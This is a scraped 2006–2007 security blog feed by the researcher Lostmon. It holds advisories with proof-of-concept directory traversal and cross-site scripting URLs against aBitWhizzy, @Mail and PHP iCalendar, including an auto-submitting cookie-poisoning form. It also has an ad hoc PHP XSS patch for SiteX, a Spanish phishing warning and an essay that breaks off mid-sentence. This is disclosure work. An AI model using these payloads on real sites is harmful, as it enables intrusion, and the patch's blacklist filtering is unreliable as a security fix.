La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-31704239830297811702007-04-21T02:06:00.000-07:002007-04-28T13:28:33.890-07:00Final patch For SiteX 0.7.3 beta XSS flaws####################################################<br />Patch for SiteX 0.7.3 beta XSS flaws<br />vendor url: http://sitex.bjsintay.com/<br />original article:http://lostmon.blogspot.com/2007/04/<br />final-patch-for-sitex-073-beta-xss.html<br />####################################################<br /><br />patch for all of this related vulns:<br /><br /><br />http://osvdb.org/displayvuln.php?osvdb_id=33158<br />http://osvdb.org/displayvuln.php?osvdb_id=33159<br />http://osvdb.org/displayvuln.php?osvdb_id=33160<br /><br />In all Files what we edit are included this file :<br /><br />'includes/functions.php'<br /><br />Open this file and add a new Function arround line 12-13<br /><br />#####################################################<br />// stop XSS function to mitigate the posible XSS flaws<br />//use StopXSS(param or function)<br /><br />function StopXSS($text){<br /><p>$text = preg_replace("/(\<script)(.*?)(script>)/si", "", "$text");<br /> $text = strip_tags($text);<br /> $text = str_replace(array("'","\"",">","<","\\","`","´"), "", $text);<br /> return $text;<br /><p>}</p><br />####################################################<br /><br />change this code :<br />####################################################<br />// - = - = - = - = - = - = - = - = -<br />// GLOBAL CODE<br />// - = - = - = - = - = - = - = - = - <br /><br />// Convert post, get, and server variables for shorthand use and<br />// register globals compatibility<br /><br />if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;<br />if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = $v;<br />if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = $v;<br />if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = $v;<br />if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = $v;<br /><br />// Prevent PHP include vulnerability, initialize important vars,<br /> will be over-written<br />#####################################################<br />for this other:<br />#####################################################<br />// - = - = - = - = - = - = - = - = -<br />// GLOBAL CODE<br />// - = - = - = - = - = - = - = - = - <br /><br />// Convert post, get, and server variables for shorthand use and<br />// register globals compatibility<br /><br />if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;<br />if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = StopXSS($v);<br />if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = StopXSS($v);<br />if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = StopXSS($v);<br />if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = StopXSS($v);<br /><br />// Prevent PHP include vulnerability, initialize important vars, will be over-written<br />#####################################################<br /><br />SiteX in full of XSS flaws , all variables are afected.<br /><br /><br />########################<br />OSVDB ID: 33158<br />########################<br />calendar.php <br />Cross-Site Scripting in variables $sxMonth and $sxYear fixed !!<br /><br />########################<br />OSVDB ID: 33159<br />########################<br />search.php<br />Cross-site scripting in $search fixed !!<br /><br />########################<br />OSVDB ID:33160<br />########################<br />redirect.php <br />Cross-Site scripting in $linkid fixed !! <br /><br />#####################################################<br /><br />it also fix this variables:<br /><br />- albumid and page upon submision to adbum.php<br />- error upon submision to login.php<br />- type upon submision to search.php<br />- sxEntryID upon submision to journal.php<br />- photoid,albumid and page upon submision to photo.php<br />- forumid and topicid upon submision forums_topic.php<br /><br />###################################################<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-67778825763094236472007-04-14T11:16:00.000-07:002007-04-21T03:24:49.216-07:00Posible patch for sitexHello !<br /><br />vendor url: http://sitex.bjsintay.com/<br /><br />Specific entry:http://sourceforge.net/tracker/index.php?<br />func=detail&aid=1700736&group_id=121558&atid=690690<br /><br />osvdb id:<a href="http://osvdb.org/displayvuln.php?osvdb_id=33158" target="_BLANK">33158</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=33159" target="_BLANK">33159</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=33160" target="_BLANK">33160</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=33161" target="_BLANK">33161</a><br /><br /><a href"http://archives.neohapsis.com/archives/bugtraq/2007-02/0477.html" target="_BLANK">http://archives.neohapsis.com/archives/bugtraq/2007-02/0477.html</a><br /><br /><a href="http://www.securityfocus.com/archive/1/archive/1/461305/100/0/threaded" target="_BLANK">http://www.securityfocus.com/archive/1/archive<br />/1/461305/100/0/threaded</a><br /><br /><a href="http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1234" target="_BLANK">http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1234</a><br /><br />after study this vulns i found a simple posible patch.<br /><br />Some others params are afected like albumid upon submit to albun.php<br />username box upon submision to login.php ,search box upon submision<br />to search.php and multiple others params. <br /><br />The most of those flaws could be solve by a simple patch<br />for "emergency" before the vendor release a update or a patch.<br /><br />Open includes/functions.php<br /><br />arround line 12-13 we have this code<br />####################################################<br />// - = - = - = - = - = - = - = - = -<br />// GLOBAL CODE<br />// - = - = - = - = - = - = - = - = - <br /><br />// Convert post, get, and server variables for shorthand use and<br />// register globals compatibility<br /><br />if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;<br />if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = $v;<br />if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = $v;<br />if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = $v;<br />if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = $v;<br /><br />// Prevent PHP include vulnerability, initialize important vars,<br /> will be over-written<br />##################################################<br /><br /><br />you can change for this other :<br /><br />##################################################<br /><blockquote><br />// stop XSS function to mitigate the posible XSS flaws<br />//use StopXSS(param or function)<br /><br />function StopXSS($text){<br /><br />$text = preg_replace("/(\<script)(.*?)(script>)/si", "", "$text");<br />$text = strip_tags($text);<br />$text = str_replace(array("'","\"",">","<","\\"), "", $text);<br />return $text;<br /><br />}<br /><br />// - = - = - = - = - = - = - = - = -<br />// GLOBAL CODE<br />// - = - = - = - = - = - = - = - = - <br /><br />// Convert post, get, and server variables for shorthand use and<br />// register globals compatibility<br /><br />if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = StopXSS($v);<br />if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = StopXSS($v);<br />if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = StopXSS($v);<br />if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = StopXSS($v);<br />if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = StopXSS($v);<br /><br />// Prevent PHP include vulnerability, initialize important vars, will<br /> be over-written<br /><br />#########################################################<br /></blockquote><br />and the most of xss flaws now are solved :D<br /><br />This patch are explain and update here :<br /><br />http://lostmon.blogspot.com/2007/04/<br />final-patch-for-sitex-073-beta-xss.html<br /><br />Thnx for your time !!!<br /><br />Thnx to OSVDB !!!<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-13631841071565921492007-03-27T10:36:00.000-07:002007-05-18T13:02:18.436-07:00aBitWhizzy traversal folder enumeration and XSS################################################<br />aBitWhizzy traversal folder enumeration and XSS<br />vendor url: http://www.unverse.net/abitwhizzy/<br />Advisore:http://lostmon.blogspot.com/2007/03/<br />abitwhizzy-traversal-folder-enumeration.html<br />vendor notify:YES exploit include:YES<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=34505" target="_blank">34505</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=34506" target="_blank">34506</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=34507" target="_blank">34507</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=34508" target="_blank">34508</a><br />Secunia:<a href="http://secunia.com/advisories/24679/" target="_BLANK">SA24679</a><br />FrSIRT:<a href="http://www.frsirt.com/english/advisories/2007/1136" target="_BLANK">FrSIRT/ADV-2007-1136</a><br />BID:<a href="http://www.securityfocus.com/bid/23167" target="_BLANK">23167</a><br />################################################<br /><br />aBitWhizzy is a php script that uses whizzywig.js to create<br />and edit web pages through a WYSIWYG interface, right through<br />your browser. Now your site can be updated by people with no<br />knowledge of HTML, FTP or AIG (Abbreviations In General).<br /><br />aBitWhizzy contains a flaw that allows a remote traversal<br />arbitrary folder enumeration.This flaw exists because the<br />application does not validate 'd' variable upon submission<br />to 'whizzylink.php','whizzypic.php','whizzery/whizzypic.php' and 'whizzery/whizzylink.php' scripts.This could allow a<br />remote users to create a specially crafted URL that would<br />execute '../' directory traversal characters to view folder<br />structure on the target system with the privileges<br />of the target web service.<br /><br />This input validation error permits too Cross-site scripting<br />Style attacks and full path disclosure.<br /><br />###################<br />VERSIONS<br />###################<br /><br />Unknow version of aBitWhizzy<br /><br />##################<br />SOLUTION<br />##################<br /><br />No solutions was available at this time !!<br /><br />######################<br />TIMELINE<br />######################<br /><br />discovered:25-03-2007<br />vendor notify:25-03-2007<br />vendor response:---------<br />Private Disclosure:25-03-2007<br />public disclosure:27-03-2007<br /><br />#######################<br />Examples<br />#######################<br /><br />Path disclosure:<br /><br />http://localhost/abitwhizzy/whizzylink.php?d='<br />http://localhost/abitwhizzy/whizzypic.php?d='<br />http://localhost/abitwhizzy/whizzery/whizzypic.php?d='<br />http://localhost/abitwhizzy/whizzery/whizzylink.php?d='<br /><br />Folder enumeration:<br /><br /><br />http://localhost/abitwhizzy/whizzylink.php?d=<br />../../../../../../../Documents%20and%20Settings<br /><br />http://localhost/abitwhizzy/whizzypic.php?d=<br />../../../../../../../Documents%20and%20Settings<br /><br />http://localhost/abitwhizzy/whizzery/whizzypic.php?d=<br />/../../../../../../../Documents%20and%20Settings<br /><br />http://localhost/abitwhizzy/whizzery/whizzylink.php?d=<br />/../../../../../../../Documents%20and%20Settings<br /><br /><br />Cross Site Scripting:<br /><br />http://localhost/abitwhizzy/whizzery/whizzypic.php?d=<br />/../../../../../../../Documents%20and%20Settings<br />"><SCRIPT>alert('XSS')</SCRIPT><br /><br /><br />http://localhost/abitwhizzy/whizzery/whizzylink.php?d=<br />/../../../../../../../Documents%20and%20Settings<br />"><SCRIPT>alert('XSS')</SCRIPT><br /><br /><br />http://localhost/abitwhizzy/whizzypic.php?d=<br />../../../../../../../Documents%20and%20Settings<br />"><SCRIPT>alert('XSS')</SCRIPT><br /><br /><br />http://localhost/abitwhizzy/whizzylink.php?d=<br />../../../../../../../Documents%20and%20Settings<br />"><SCRIPT>alert('XSS')</SCRIPT><br /><br /><br />########################### €nd ###################################<br /><br />Thnx to estrella Que te ailoviuu un monton ;P<br />Thnx to all Lostmon´s Group Team<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-62390318153602328552007-02-27T11:59:00.000-08:002007-02-27T12:27:12.904-08:00Correo falso de Gmail pretende engañar a sus usuarios<div align="justify">Lostmon nos reporta la divulgación de un correo fraudulento,</div><div align="justify">que pretende apoderarse de las contraseñas de los usuarios del</div><div align="justify">correo de Gmail, además de descargar un archivo malicioso.<br /><br />Si bien el sitio ya ha sido cerrado, es bueno estar siempre atentos</div><div align="justify">a este tipo de engaños, ya que es muy común que con pequeñas</div><div align="justify">variantes, vuelvan a reiterarse periódicamente.<br /><br />En este caso, el mensaje ha sido distribuido en forma de spam, </div><div align="justify">simulando provenir de Gmail. El mismo informa que "debido al </div><div align="justify">aumento de virus en las redes," nuestra cuenta va a ser cancelada</div><div align="justify">a menos que descarguemos y ejecutemos una herramienta que</div><div align="justify">supuestamente "nos liberará de estas alimañas".<br /><br />--- Parte del texto del mensaje original ---<br /><br />Gmail Informativa sulla Privacy<br />Pol?tica de Privacidade do Gmail<br /><br />31 de janeiro de 2007<br /><br />Para que continue a usar o nosso servi?o Gmail, antes de entrar </div><div align="justify">no seu e-mail ou Orkut ter? que baixa nosso arquivo de seguran?a,</div><div align="justify">devido a grande n?meros de v?rus na rede, caso desconsidere este</div><div align="justify">aviso automaticamente e-mail cancelado</div><div align="justify">em ate 30 dias ?teis pelo nosso sistema.<br /><br />Según el examen de Lostmon, los enlaces y otras direcciones en el </div><div align="justify">mensaje, apuntan a dominios que nada tienen que ver con Gmail,</div><div align="justify">pero la construcción del correo y los sitios falsos, han sido </div><div align="justify">cuidadosamente elaborados para simular ser los de Google.<br /><br />El origen del spam parece ser Brasil, las páginas falsas estaban </div><div align="justify">alojadas en servidores gratuitos, mientras la falsa herramienta</div><div align="justify">se descargaba desde un servidor ruso (dicho archivo ya no existe).<br /><br />Este tipo de mensaje, también suele ser utilizado para la distribución</div><div align="justify">de troyanos como el Win32/Spy.Banker, malware capaz de robar</div><div align="justify">información confidencial relacionada con las cuentas bancarias de </div><div align="justify">quienes caen en el engaño.<br /><br />Como siempre, se recomienda no seguir enlaces ni abrir adjuntos</div><div align="justify">de mensajes que no hayan sido solicitados, sin importar su origen.<br /><br /><br />Más información:<br /><br />Nuevamente los usuarios de Gmail están en peligro </div><div align="justify"><br /><a href="http://groups.google.com/group/lostmon/"><span style="font-size:85%;" target="_blank">http://groups.google.com/group/lostmon/</span></a></div><div align="justify"><a href="http://groups.google.com/group/lostmon/browse_thread/thread/da8453d7e73d6e97" target="_blank"><span style="font-size:85%;">http://groups.google.com/group/lostmon/<br />browse_thread/thread/da8453d7e73d6e97</span></a><br /><br /></div><div align="justify">Articlulo redactado por Angela Ruiz (<a href="mailto:angela@videosoft.net.uy">angela@videosoft.net.uy</a>)</div><div align="justify"></div><div align="justify">Url del articulo: <a href="http://vsantivirus.com/spam-gmail-27-02-07.htm">http://vsantivirus.com/spam-gmail-27-02-07.htm</a><br />(c) Video Soft - <a href="http://www.videosoft.net.uy" target="_blank">http://www.videosoft.net.uy</a><br />(c) VSAntivirus - <a href="http://www.vsantivirus.com" target="_blank">http://www.vsantivirus.com</a> </div><div align="justify"></div><div align="justify"></div><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-20403051072021748302007-02-13T10:42:00.000-08:002007-02-14T12:01:41.077-08:00@Mail Search.pl keywords variable cross-site scripting#########################################################<br />@Mail Search.pl keywords variable cross-site scripting<br />vendor url:http://www.atmail.com<br />Advisory:http://lostmon.blogspot.com/2007/02/<br />mail-searchpl-keywords-variable-cross.html<br />vendor notify:yes exploit available: yes<br />Secunia: <a href="http://secunia.com/advisories/24155/" target="_blank">SA24155</a><br />BID:<a href="http://www.securityfocus.com/bid/22552" target="_BLANK">22552</a><br />FrSIRT:<a href="http://www.frsirt.com/english/advisories/2007/0603" target="_blank">ADV-2007-0603</a><br />#########################################################<br /><br /><br />@Mail is a feature rich Email solution that allows users to access<br />email-resources via the web or a variety of wireless devices. The<br />software incorporates a complete email-server package to manage<br />and host user email at your domain(s)<br /><br /><br />@Mail contains a flaw that allows a remote cross site scripting<br />attack.This flaw exists because the application does not validate<br />user input in search form in html/[languaje folder]/help/search.html<br />upon submision to search.pl script the keywords variable are afected<br />by this flaw uopn submision to search.pl script too.This could<br />allow a user to create a specially crafted URL that would execute<br />arbitrary code in a user's browser within the trust relationship<br />between the browser and the server, leading to a loss of integrity.<br /><br /><br />#############<br />versions<br />#############<br />All of this versions Are vulnerables:<br /><br />@mail 4.61<br />@mail 4.6<br />@mail 4.51<br />@Mail 4.03 WebMail for Windows<br />@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X /<br /><br />it is also posible other versions are vulnerable.<br /><br />#################<br />solution<br />#################<br /><br />no solution was available at this time !!!<br /><br />#################<br />Timeline<br />#################<br /><br />Discovered:02-07-2005<br />vendor notify:11-02-2007<br />vendor response:--------<br />disclosure: 13-02-2007<br /><br /><br />###############<br />Examples<br />###############<br /><br />go to :<br /><br />http://localhost/parse.pl?file=html/english/help/search.html<br /><br />and insert in the search form this script:<br /><br />"><script>alert(document.forms.keywords)</script><br /><br />or exploit directly to search.pl<br /><br />http://localhost/search.pl?func=searchhelp&keywords=<br />"><script>alert(document.forms.keywords)</script>&Submit2=Search<br /><br />######################## €nd ##########################<br /><br />Thnx to estrella to be my ligth<br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon/ (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1167163670567000712006-12-27T13:35:00.002-08:002010-04-18T08:10:41.164-07:00PHP icalendar multiple variable cross site scripting#####################################################<br />
PHP icalendar multiple variable cross site scripting<br />
Vendor url:http://phpicalendar.net/<br />
Advisore:http://lostmon.blogspot.com/2006/12/<br />
php-icalendar-multiple-variable-cross.html<br />
Vendor notify: YES Exploit included:YES<br />
OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=32493" target="_BLAAK">32493</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=32494" target="_BLAAK">32494</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=32495" target="_BLAAK">32495</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=32496" target="_BLAAK">32496</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=32497" target="_BLAAK">32497</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=32498" target="_BLAAK">32498</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=32499" target="_BLAAK">32499</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=32500" target="_BLAAK">32500</a><br />
Securitytracker:<a href="http://securitytracker.com/alerts/2006/Dec/1017449.html" target="_BLANK">1017449</a><br />
Secunia:<a href="http://secunia.com/advisories/23499/" target="_BLANK">SA23499</a><br />
BID:<a href="http://www.securityfocus.com/bid/21792/" target="_BLANK">21792</a><br />
#####################################################<br />
<br />
<br />
PHP icalendar contains a flaw that allows a remote cross site<br />
scripting attack.This flaw exists because the application does<br />
not validate multiple params upon submission to multiple scripts.<br />
This could allow a user to create a specially crafted URL that<br />
would execute arbitrary code in a user's browser within the<br />
trust relationship between the browser and the server, leading<br />
to a loss of integrity.<br />
<br />
######################<br />
versions<br />
######################<br />
<br />
all of this versions have been tested<br />
Posible other versions are prone vulnerables.<br />
<br />
PHP iCalendar 2.23 rc1<br />
PHP iCalendar 2.22<br />
PHP icalendar 2.0 Beta<br />
PHP iCalendar 1.1<br />
<br />
######################<br />
Solution:<br />
######################<br />
<br />
No solution was available at this time!!<br />
<br />
##################<br />
Time Line<br />
##################<br />
<br />
Discovered:20-12-2006<br />
Vendor notify:25-12-2006<br />
Vendor response:<br />
Disclosure:27-12-2006<br />
<br />
###################<br />
EXAMPLES & PoC<br />
###################<br />
<br />
http://localhost/phpicalendar/day.php?cal=<br />
all_calendars_combined971&getdate=<br />
20061225"><script>alert()</script><br />
<br />
http://localhost/phpicalendar/month.php?cal=<br />
all_calendars_combined971&getdate=20061225<br />
"><script>alert()</script><br />
<br />
http://localhost/phpicalendar/year.php?cal=<br />
all_calendars_combined971&getdate=20061225<br />
"><script>alert()</script><br />
<br />
http://localhost/phpicalendar/week.php?cal=<br />
all_calendars_combined971&getdate=20061225<br />
"><script>alert()</script><br />
<br />
http://localhost/phpicalendar/day.php?cpath=<br />
%22%3E%3Cscript%3Edocument.write(document.domain)<br />
%3C/script%3E&getdate=20061225&cal%5B%5D=<br />
Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work<br />
<br />
<br />
http://localhost/phpicalendar/month.php?cpath=<br />
%22%3E%3Cscript%3Edocument.write(document.domain<br />
)%3C/script%3E&getdate=20061225&cal%5B%5D<br />
=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work<br />
<br />
<br />
http://localhost/phpicalendar/year.php?cpath=<br />
%22%3E%3Cscript%3Edocument.write(document.domain)<br />
%3C/script%3E&getdate=20061225&cal%5B%5D=<br />
Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work<br />
<br />
<br />
http://localhost/phpicalendar/week.php?cpath=<br />
%22%3E%3Cscript%3Edocument.write(document.domain)<br />
%3C/script%3E&getdate=20061225&cal%5B%5D=<br />
Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work<br />
<br />
<br />
----<br />
<br />
<br />
http://localhost/phpicalendar/search.php?cpath=<br />
&cal=Home%2CUS%2BHolidays%2CWork&getdate=<br />
19700102&query=ss"><script>alert()</script>&submit.x=11&submit.y=15<br />
<br />
<br />
http://localhost/phpicalendar/search.php?cpath=<br />
"><script>alert()</script>&<br />
cal=Home%2CUS%2BHolidays2CWork&getdate=<br />
19700102&query=ss&submit.x=11&submit.y=12<br />
<br />
<br />
<br />
http://localhost/phpicalendar/search.php?cpath=&<br />
cal=Home%2CUS%2BHolidays%2CWork&getdate=19700102<br />
"><script>alert()</script>&<br />
query=ss&submit.x=11&submit.y=12<br />
<br />
----<br />
<br />
http://localhost/phpicalendar/rss/index.php?cal=Home<br />
,US+Holidays,Work&getdate=20061225"><<br />
script>alert()</script><br />
<br />
http://localhost/phpicalendar/print.php?cal=Home,<br />
US+Holidays,Work&getdate=20061225%22%3E%3Cscr<br />
ipt%3Ealert()%3C/script%3E&printview=day<br />
<br />
################################<br />
Proof of concept for preferences<br />
################################<br />
<br />
Multiple param XSS in preferences.php<br />
<br />
Use the proof and modify some params<br />
create a evil cookie before submit :)<br />
<br />
http://localhost/phpicalendar/preferences.php?cal=<br />
Home,US+Holidays,Work&getdate=20061227%22%3E%3<br />
Cscript%3Ealert()%3C/script%3E<br />
<br />
<br />
<html><br />
<head></head><br />
<body><br />
<title>PHP icalendar XSS in preferences.php PoC</title><br />
<p><a href="http://phpicalendar.net/" target="_BLANK">PHP<br />
icalendar</a> <= 2.23 rc1 preferences.php XSS Proof Of concept By <a<br />
href="http://Lostmon.blogspot.com" target="_BLANK">Lostmon</a></p><br />
<p>Modify the target host , by default http://localhost/</P><br />
<br /><br /><form method='post'<br />
action='http://localhost/phpicalendar/preferences.php?action=setcookie'><br />
cookie_language: <input input='text' value='Spanish'<br />
name='cookie_language' style='width: 80%' /><br><br />
cookie_calendar: <input input='text'<br />
value='all_calendars_combined971' name='cookie_calendar' style='width:<br />
80%' /><br><br />
cpath: <input input='text'<br />
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'<br />
name='cpath' style='width: 80%' /><br><br />
cookie_view: <input input='text' value='day' name='cookie_view'<br />
style='width: 80%' /><br><br />
cookie_time: <input input='text' value='0700' name='cookie_time'<br />
style='width: 80%' /><br><br />
cookie_startday: <input input='text' value='Sunday'<br />
name='cookie_startday' style='width: 80%' /><br><br />
cookie_style: <input input='text' value='default' name='cookie_style'<br />
style='width: 80%' /><br><br />
unset: <input input='text'<br />
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'<br />
name='unset' style='width: 80%' /><br><br />
set: <input input='text'<br />
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'<br />
name='set' style='width: 80%' /><br><br />
<input type='submit' value='submit' /><br><br />
</form><hr /><br />
<textarea style='width: 80%; height: 50%;'><br />
<form method='post'<br />
action='http://localhost/phpicalendar/preferences.php?action=setcookie'><br />
cookie_language: <input input='text' value='Spanish'<br />
name='cookie_language' style='width: 80%' /><br><br />
cookie_calendar: <input input='text'<br />
value='all_calendars_combined971' name='cookie_calendar' style='width:<br />
80%' /><br><br />
cpath: <input input='text'<br />
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'<br />
name='cpath' style='width: 80%' /><br><br />
<br />
cookie_view: <input input='text' value='day' name='cookie_view'<br />
style='width: 80%' /><br><br />
cookie_time: <input input='text' value='0700' name='cookie_time'<br />
style='width: 80%' /><br><br />
cookie_startday: <input input='text' value='Sunday'<br />
name='cookie_startday' style='width: 80%' /><br><br />
cookie_style: <input input='text' value='default' name='cookie_style'<br />
style='width: 80%' /><br><br />
unset: <input input='text'<br />
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'<br />
name='unset' style='width: 80%' /><br><br />
set: <input input='text'<br />
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'<br />
name='set' style='width: 80%' /><br><br />
<input type='submit' value='submit' /><br><br />
</form><br />
&lt;script&gt;<br />
document.forms[0].submit()<br />
&lt;/script&gt;<br />
</textarea><br />
</body><br />
</html><br />
<br />
<br />
######################## €nd #####################<br />
<br />
Thnx to Estrella to be my ligth.<br />
<br />
-- <br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1166730568384086012006-12-21T11:25:00.000-08:002006-12-23T03:03:12.870-08:00Indexacion de vulnerabilidades########################################<br />Indexacion de algunas vulnerabilidades<br />########################################<br /><br /><div align="justify">En los últimos años, después de profundizar en la forma, en que<br />las nuevas vulnerabilidades son descubiertas y publicadas, desde<br />el punto de vista de aquel que las descubre, y las publica.<br /><br />Cual es en si el proceso que se sigue, desde que esa vulnerabilidad<br />es descubierta, hasta que es publicada por las numerosas listas de<br />seguridad, cómo son añadidas a las bases de datos de esas listas,<br />cómo se documentan, y por ultimo como son publicadas, se me<br />ocurren varias consideraciones a tener en cuenta…<br /><br />Se ha intentado durante mucho tiempo una estandarización,<br />para poder clasificar los archivos de fallas, de una manera<br />en la cual fuese fácil reconocerlas (causa del mismo), saber<br />el tipo de ataque que puede llevarse a cabo (Impacto) Y su<br />posible mitigación o solución.<br /><br />Me gustaría hacer un inciso sobre todo en la forma en la que<br />se suelen tratar una serie de vulnerabilidades, las cuales<br />suelen ser explotables a través de la URL o en si digamos en<br />la modificación de los valores de alguna de las variables<br />o parámetros de la URL.<br /><br />Las vulnerabilidades sobre las que me gustaría hacer un<br />comentario son las siguientes:<br /><br />Cross-site Scripting, SQL injection, traversal arbitrary file access<br />y alguno que me dejo en el tintero.<br /><br /><br />Todos estos agujeros suelen ser explotados a través de la URL, <br />y casi todos hacen uso de las diferentes variables, pasadas <br />por la URL de una página a otra en las peticiones POST o GET<br />de un sitio Web.<br /><br />Si tomamos por ejemplo una URL con varios parámetros en la <br />cual hubiese uno de ellos vulnerable...<br /><br />http://[victim]/folder/file.php?var1=value1&var2=[XSS-CODE]<br />&var3=value3<br /><br />Esta vulnerabilidad seria seguramente llamada...<br /><br />[Producto afectado]+ [Nombre de la variable]+ [agujero]<br /><br />Con lo cual diríamos que nuestro producto es vulnerable en <br />la variable var2 a un bug de tipo Cross site scripting.<br /><br />Cuando esta vulnerabilidad llega a las listas de seguridad, estas hacen<br />eco de ella y le añaden el archivo afectado, si el descubridor no lo<br />especifica, con lo cual nuestra vulnerabilidad en su descripción diría<br />que el producto XXX es vulnerable en la variable var2 a cross site<br />scripting al ser enviada al archivo 'file.php'<br /><br />¿Que pasaría si dicha variable no estuviera definida en esa pagina?<br />que viniese de otra pagina de la que hemos echo un POST o que <br />estuviese en otro archivo y este fuese incluido en la pagina que<br />supuestamente es la vulnerable?<br /><br />Seguramente nos volveríamos locos a la hora de intentar localizar el<br />fallo y deberíamos mirar muchos mas archivos de los que en realidad<br />necesitamos para fijar esa vulnerabilidad en una determinada llamada<br />a la variable afectada.<br /><br />Seguramente al desarrollador le costaría mas encontrar exactamente<br />el error, pues en si directamente le estamos dando información <br />incorrecta sobre donde se haya situada la vulnerabilidad al <br />facilitar un archivo donde supuestamente la variable falla.<br /><br />Si ponemos como ejemplo un portal tipo PHP-NUKE el cual en <br />el ejemplo,la primera variable llama a un modulo, la segunda<br />proviene del modulo llamado.<br /><br />http://[PHP-NUKE]/modules.php?name=News&new_topic=1<br /><br />Si existiese una 